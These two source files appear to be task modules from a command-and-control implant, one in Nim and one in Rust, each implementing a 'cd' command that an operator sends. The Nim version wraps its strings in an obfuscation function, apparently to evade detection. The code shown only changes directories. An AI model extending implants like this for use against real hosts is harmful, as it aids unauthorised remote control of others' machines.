File: client/commands/cd.nim
from os import setCurrentDir, normalizePath
from strutils import join

# Change the current working directory
proc cd*(args : varargs[string]) : string =
    var newDir = args.join(obf(" "))
    if newDir == "":
        result = obf("Invalid number of arguments received. Usage: 'cd [directory]'.")
    else:
        newDir.normalizePath()
        setCurrentDir(newDir)
        result = obf("Changed working directory to '") & newDir & obf("'.")

File: client-rs/src/internal/tasks/cd.rs
use std::env;
use std::path::Path;
use crate::internal::listener::{TaskHandler};

pub static COMMAND: &str = "cd";
pub struct Command {}

impl TaskHandler for Command {
    fn handle(&self, _: String, args: Vec<String>) -> Result<String, Box<dyn std::error::Error>> {
        #[cfg(any(feature = "debug_assertions", feature = "debug"))]
        println!("Executing command `{}` with args `{:?}`", COMMAND, args.clone());

        if args.len() != 1 {
            return Ok("Invalid number of arguments received. Usage: 'cd [directory]'.".to_string());
        }

        let path = args.first().unwrap();
        let root = Path::new(path);
        let normalized_root = root.clone().canonicalize().unwrap_or_default();

        return match env::set_current_dir(&root) {
            Ok(_) => Ok(format!("Changed working directory to '{}'.", normalized_root.display())),
            Err(_) => Ok("[ERROR] Could not change working directory.".to_string())
        }
    }
}